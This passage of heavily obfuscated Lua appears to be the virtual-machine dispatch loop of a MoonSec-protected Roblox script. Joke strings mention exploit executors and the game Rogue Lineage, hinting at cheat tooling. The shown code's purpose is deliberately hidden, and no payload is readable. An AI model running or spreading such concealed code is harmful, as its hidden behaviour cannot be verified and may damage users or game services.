__[_l_+3]=_l_l;end break end while(_l_)/((0x1b3c-(-#'int 21h on top'+(0x1b8c-3538))))==3663 do local _l__;local __l_l,_lll_;local __ll;local _l_;__[_[___]]={};_l=_l+_ll;_=__l[_l];__[_[___l]][_[_l_ll]]=__[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]][_[__lll]]=_[__l__];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];_l_=_[___];__ll=__[_[_llll]];__[_l_+1]=__ll;__[_l_]=__ll[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[___ll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[____]][_[_l_l_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];__ll=__[_[_llll]];__[_l_+1]=__ll;__[_l_]=__ll[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[_l_ll]];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__l_l,_lll_=_lllll(__[_l_](__[_l_+_l__l]))____l=_lll_+_l_-_ll _l__=0;for _=_l_,____l do _l__=_l__+_ll;__[_]=__l_l[_l__];end;_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_](_l_l(__,_l_+_l__l,____l))_l=_l+_ll;_=__l[_l];do return end;break end;break;end while 2282==(_l_)/(((4049+-0x31)+-0x34))do _l_=(2256642)while(-0x7f+256)<__l_l do _l_-= _l_ local _ll=_[_ll_l];local _l_=__[_ll+2];local __l=__[_ll]+_l_;__[_ll]=__l;if(_l_>0)then if(__l<=__[_ll+1])then _l=_[____];__[_ll+3]=__l;end elseif(__l>=__[_ll+1])then _l=_[__ll];__[_ll+3]=__l;end break end while(_l_)/((-0x40+(-41+0xacb)))==849 do local ____;local _l_;_l_=_[_ll_]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___];____=__[_[__ll]];__[_l_+1]=____;__[_l_]=____[__[_[__ll_]]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];break end;break;end break;end break;end while 2600==(_l_)/((3065+-0x25))do _l_=(263796)while __l_l<=(-#[[free nitro real?!]]+(0xfa+-99))do _l_-= _l_ _l_=(4324936)while(302-0xaa)>=__l_l do _l_-= _l_ _l_=(210545)while(33012/0xfc)<__l_l do _l_-= _l_ local _ll=_[_lll];local __l=__[_ll]local _l_=__[_ll+2];if(_l_>0)then if(__l>__[_ll+1])then _l=_[_l_ll];else __[_ll+3]=__l;end elseif(__l<__[_ll+1])then _l=_[_llll];else __[_ll+3]=__l;end break end while 85==(_l_)/((-#[[oh oh i will hack you =opens dev console=]]+(5157-0xa4f)))do local __l_l;local _l_;_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];__l_l=__[_[_l_ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[__[_[_lll_]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_lll];__l_l=__[_[___ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[__[_[_l_l_]]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[___]]={};_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];break end;break;end while 1496==(_l_)/((((-121+0x223f9)/0x30)+-#"powered by ROBLOX Corporation"))do _l_=(5828240)while __l_l>(0x178-243)do _l_-= _l_ local ___;local _l_;__[_[_ll_]]=_____[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[__ll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[____]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[__lll]][_[__ll_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];___=__[_[_llll]];__[_l_+1]=___;__[_l_]=___[_[__l__]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];do return end;break end while 3938==(_l_)/(((3116-((0xd4e-1730)+-#'why cant i use localplayer on server scripts pls help im noob'))+-#"stOP READING MY CODE!"))do __[_[_ll_]]=__[_[___ll]][__[_[__ll_]]];break end;break;end break;end while 534==(_l_)/(((-0x5c+(-#'Rogue Lineage'+(0xddb8/88)))+-#'this file is protected by the cheeto door lock'))do _l_=(4572625)while((0x8b37/227)+-#[[stOP READING MY CODE!]])>=__l_l do _l_-= _l_ _l_=(6976766)while(13500/0x64)<__l_l do _l_-= _l_ local __lll;local _l_;_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_lll];__lll=__[_[__ll]];__[_l_+1]=__lll;__[_l_]=__lll[__[_[___l_]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=(_[__ll]~=0);break end while(_l_)/(((448526/0xa9)+-#'nice executor bro. 2 HttpGets crash it..'))==2669 do local ___l;local _l_;_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,_[____]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];___l=__[_[_llll]];__[_l_+1]=___l;__[_l_]=___l[__[_[__ll_]]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))break end;break;end while 3925==(_l_)/((0x97e-1265))do _l_=(2235100)while((421-0x110)+-#"mer is white")<__l_l do _l_-= _l_ local _l___;local _____,__llll;local __l_l;local _l_;__[_[_ll_]]();_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[___ll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[_l_ll]][_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[___ll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[____]][_[_lll_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];__l_l=__[_[__ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[___ll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__ll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[__lll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[____]][_[_ll__]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]={};_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]][_[__ll]]=__[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_l__]][_[____]]=_[__l__];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];__l_l=__[_[___ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__ll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[_llll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];__l_l=__[_[__lll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[____]];_l=_l+_ll;_=__l[_l];_l_=_[_l__]_____,__llll=_lllll(__[_l_](__[_l_+_l__l]))____l=__llll+_l_-_ll _l___=0;for _=_l_,____l do _l___=_l___+_ll;__[_]=_____[_l___];end;_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,____l))break end while 1085==(_l_)/((((0x10e5+-97)-2132)+-#[[sussy amogus balls in ya mouth kiddo]]))do local __l=_[___];local ___=_[__ll_];local _l_=__l+2 local __l={__[__l](__[__l+1],__[_l_])};for _=1,___ do __[_l_+_]=__l[_];end;local __l=__l[1]if __l then __[_l_]=__l _l=_[__lll];else _l=_l+_ll;end;break end;break;end break;end break;end break;end while 145==(_l_)/((-#[[guys listen... sussex XD]]+(599+-0x5d)))do _l_=(3939824)while __l_l<=(408-0x106)do _l_-= _l_ _l_=(6312629)while __l_l<=((0x1249e/227)-188)do _l_-= _l_ _l_=(569055)while((0x5133/123)+-#"free moonsec anywhere you go!")>=__l_l do _l_-= _l_ _l_=(367098)while __l_l>(-#'Fun and games until a = (function() a() end) a()'+(0x46db/97))do _l_-= _l_ local _l_;__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];if not __[_[_ll_l]]then _l=_l+_l__l;else _l=_[__lll];end;break end while(_l_)/((-93+0xd3))==3111 do __l_[_[__lll]]=__[_[_lll]];break end;break;end while 177==(_l_)/((-#[[moon 3.1]]+(0xd12+-123)))do _l_=(8346648)while(264+-0x7b)<__l_l do _l_-= _l_ local _l_;__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[_l_ll]][__[_[_lll_]]];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[____]];_l=_l+_ll;_=__l[_l];_l=_[__lll];break end while(_l_)/((0x1cdd-3733))==2283 do local _l=_[_l__]__[_l]=__[_l](_l_l(__,_l+_ll,_[_llll]))break end;break;end break;end while(_l_)/((-#"give access to functions for boosters"+(4784-0x996)))==2753 do _l_=(7126218)while __l_l<=(-#"1 plus 1 doesnt equal 111"+(393-0xe0))do _l_-= _l_ _l_=(5142136)while(22451/0x9d)<__l_l do _l_-= _l_ local _l_;__[_[_lll]]();_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];_l=_[__lll];break end while(_l_)/((418400/0xc8))==2458 do local ____;local _l_;__l_[_[_llll]]=__[_[___l]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__];____=__[_[___ll]];__[_l_+1]=____;__[_l_]=____[__[_[_l_l_]]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=(_[__ll]~=0);break end;break;end while 3999==(_l_)/((253044/0x8e))do _l_=(890590)while((0x18f-242)+-#"cry about it")<__l_l do _l_-= _l_ if(__[_[_ll_l]]~=_[_l_l_])then _l=_l+_l__l;else _l=_[____];end;break end while 290==(_l_)/((-#'Before you marry someone make them use a computer with slow internet to see who they really are'+(0x1930-3282)))do local _l_;_l_=_[_ll_]__[_l_]=__[_l_]()_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];if(__[_[___l]]==__[_[_l_l_]])then _l=_l+_l__l;else _l=_[_llll];end;break end;break;end break;end break;end while 1624==(_l_)/((0x9dd+-99))do _l_=(7577540)while __l_l<=(0x16c-214)do _l_-= _l_ _l_=(4524288)while __l_l<=(0x5a30/156)do _l_-= _l_ _l_=(1823913)while __l_l>(0x15c-201)do _l_-= _l_ if(__[_[___]]<=_[__l__])then _l=_l+_l__l;else _l=_[___ll];end;break end while(_l_)/((19278/0x12))==1703 do __[_[_ll_l]]=(_[_l_ll]~=0);_l=_l+_l__l;break end;break;end while(_l_)/((0xaf2+-50))==1644 do _l_=(1236257)while((0x103+-96)+-#"Bye bye :wave:")<__l_l do _l_-= _l_ local ___ll;local __l_l,___l_;local ____;local _l_;__[_[_lll]]();_l=_l+_ll;_=__l[_l];__[_[___]]={};_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_l__]][_[_l_ll]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];_l_=_[_l__];____=__[_[_llll]];__[_l_+1]=____;__[_l_]=____[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__ll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__lll]][_[__ll_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];____=__[_[__ll]];__[_l_+1]=____;__[_l_]=____[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[__ll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__l_l,___l_=_lllll(__[_l_](__[_l_+_l__l]))____l=___l_+_l_-_ll ___ll=0;for _=_l_,____l do ___ll=___ll+_ll;__[_]=__l_l[___ll];end;_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_](_l_l(__,_l_+_l__l,____l))_l=_l+_ll;_=__l[_l];_l=_[_llll];break end while 2057==(_l_)/((((-41+0x324)+-#[[Broo u/thatHEXdude slapped this server]])+-124))do local _=_[_ll_l];do return __[_](_l_l(__,_+1,____l))end;break end;break;end break;end while(_l_)/((-#"mer is white"+(4546-0x900)))==3398 do _l_=(1236708)while(0x28f8/69)>=__l_l do _l_-= _l_ _l_=(2911962)while((395-0xe0)+-#'brick luke deez nuts')<__l_l do _l_-= _l_ do return end;break end while(_l_)/((-#'i still hate noobmaster'+((2371600/0x9a)/0x8)))==1531 do local __l_l;local _l_;__[_[_ll_l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];_l_=_[_l__];__l_l=__[_[___ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[___ll]][__[_[___l_]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[____]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__ll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__lll]][_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__ll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[_l_ll]][_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[_llll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[___ll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[__lll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[_l_ll]][_[___l_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];__l_l=__[_[__lll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_ll__]];break end;break;end while(_l_)/(((-32+0x18b)+-#'bite this onions'))==3564 do _l_=(265437)while __l_l>((0x1a0-227)+-#"sussy amogus balls in ya mouth kiddo")do _l_-= _l_ local _l_;__[_[___]][__[_[____]]]=__[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]][__[_[____]]]=__[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___l]][__[_[__ll]]]=__[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[___]][__[_[___ll]]]=__[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l